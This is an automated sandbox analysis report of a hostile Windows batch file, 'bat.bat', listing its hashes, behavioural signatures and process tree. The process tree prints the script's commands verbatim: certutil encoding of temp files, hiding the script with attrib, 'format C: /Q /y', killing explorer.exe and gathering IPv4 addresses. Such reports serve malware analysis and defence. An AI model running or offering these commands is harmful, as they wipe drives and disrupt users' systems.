Analysis
-
max time kernel
142s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20230915-en -
resource tags
arch:x64arch:x86image:win10v2004-20230915-enlocale:en-usos:windows10-2004-x64system -
submitted
23/09/2023, 03:05
Static task
static1
Behavioral task
behavioral1
Sample
bat.bat
Resource
win7-20230831-en
5 signatures
150 seconds
Behavioral task
behavioral2
Sample
bat.bat
Resource
win10v2004-20230915-en
5 signatures
150 seconds
General
-
Target
bat.bat
-
Size
77KB
-
MD5
466a311205b514581aa61ce02ead19a4
-
SHA1
aeb2acb70b4a82bd6de876aba272158706ae021c
-
SHA256
50f9ea4f06de30d775c8315587f0bce404a6946a67b2d8a5a2cdc61279880dff
-
SHA512
83e59aab5ffd7b8e9cefe00ff6a2e0e235d502316088efc063477fa06f765ef376c11ac311193fa88472d91e3fa378a97476f8656c7ad7fdcb08a35c0001bb1f
-
SSDEEP
384:/qmB+m9dm9hm9rm99m93ml5mlomlumlSmlcmlsmlkmllmlZmjDmlfmn7mlJmlTm6:HjcIm8KcBn7Vl9oemQes2kfbx
Score
1/10
Malware Config
Signatures
-
Gathers network information 2 TTPs 1 IoCs
Uses commandline utility to view network configuration.
pid Process 1848 ipconfig.exe -
Kills process with taskkill 1 IoCs
pid Process 3656 taskkill.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 3656 taskkill.exe -
Suspicious use of WriteProcessMemory 24 IoCs
description pid Process procid_target PID 5064 wrote to memory of 2628 5064 cmd.exe 86 PID 5064 wrote to memory of 2628 5064 cmd.exe 86 PID 5064 wrote to memory of 1908 5064 cmd.exe 87 PID 5064 wrote to memory of 1908 5064 cmd.exe 87 PID 5064 wrote to memory of 4612 5064 cmd.exe 88 PID 5064 wrote to memory of 4612 5064 cmd.exe 88 PID 5064 wrote to memory of 4364 5064 cmd.exe 89 PID 5064 wrote to memory of 4364 5064 cmd.exe 89 PID 5064 wrote to memory of 4832 5064 cmd.exe 90 PID 5064 wrote to memory of 4832 5064 cmd.exe 90 PID 5064 wrote to memory of 456 5064 cmd.exe 91 PID 5064 wrote to memory of 456 5064 cmd.exe 91 PID 5064 wrote to memory of 4092 5064 cmd.exe 92 PID 5064 wrote to memory of 4092 5064 cmd.exe 92 PID 5064 wrote to memory of 2972 5064 cmd.exe 93 PID 5064 wrote to memory of 2972 5064 cmd.exe 93 PID 5064 wrote to memory of 1088 5064 cmd.exe 96 PID 5064 wrote to memory of 1088 5064 cmd.exe 96 PID 5064 wrote to memory of 3656 5064 cmd.exe 97 PID 5064 wrote to memory of 3656 5064 cmd.exe 97 PID 5064 wrote to memory of 1848 5064 cmd.exe 99 PID 5064 wrote to memory of 1848 5064 cmd.exe 99 PID 5064 wrote to memory of 1836 5064 cmd.exe 100 PID 5064 wrote to memory of 1836 5064 cmd.exe 100 -
Views/modifies file attributes 1 TTPs 1 IoCs
pid Process 4092 attrib.exe
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\bat.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:5064 -
C:\Windows\system32\certutil.execertutil -encode "C:\Users\Admin\AppData\Local\Temp\BroadcastMsg_1694758968.txt" "C:\Users\Admin\AppData\Local\Temp\BroadcastMsg_1694758968.txt.enc"2⤵PID:2628
-
-
C:\Windows\system32\certutil.execertutil -encode "C:\Users\Admin\AppData\Local\Temp\dd_NDP472-KB4054530-x86-x64-AllOS-ENU_decompression_log.txt" "C:\Users\Admin\AppData\Local\Temp\dd_NDP472-KB4054530-x86-x64-AllOS-ENU_decompression_log.txt.enc"2⤵PID:1908
-
-
C:\Windows\system32\certutil.execertutil -encode "C:\Users\Admin\AppData\Local\Temp\dd_vcredistMSI4310.txt" "C:\Users\Admin\AppData\Local\Temp\dd_vcredistMSI4310.txt.enc"2⤵PID:4612
-
-
C:\Windows\system32\certutil.execertutil -encode "C:\Users\Admin\AppData\Local\Temp\dd_vcredistMSI433A.txt" "C:\Users\Admin\AppData\Local\Temp\dd_vcredistMSI433A.txt.enc"2⤵PID:4364
-
-
C:\Windows\system32\certutil.execertutil -encode "C:\Users\Admin\AppData\Local\Temp\dd_vcredistUI4310.txt" "C:\Users\Admin\AppData\Local\Temp\dd_vcredistUI4310.txt.enc"2⤵PID:4832
-
-
C:\Windows\system32\certutil.execertutil -encode "C:\Users\Admin\AppData\Local\Temp\dd_vcredistUI433A.txt" "C:\Users\Admin\AppData\Local\Temp\dd_vcredistUI433A.txt.enc"2⤵PID:456
-
-
C:\Windows\system32\attrib.exeattrib +h C:\Users\Admin\AppData\Local\Temp\bat.bat2⤵
- Views/modifies file attributes
PID:4092
-
-
C:\Windows\system32\format.comformat C: /Q /y2⤵PID:2972
-
-
C:\Windows\system32\mode.commode con cols=107 lines=412⤵PID:1088
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im explorer.exe2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3656
-
-
C:\Windows\system32\ipconfig.exeipconfig2⤵
- Gathers network information
PID:1848
-
-
C:\Windows\system32\findstr.exefindstr IPv42⤵PID:1836
-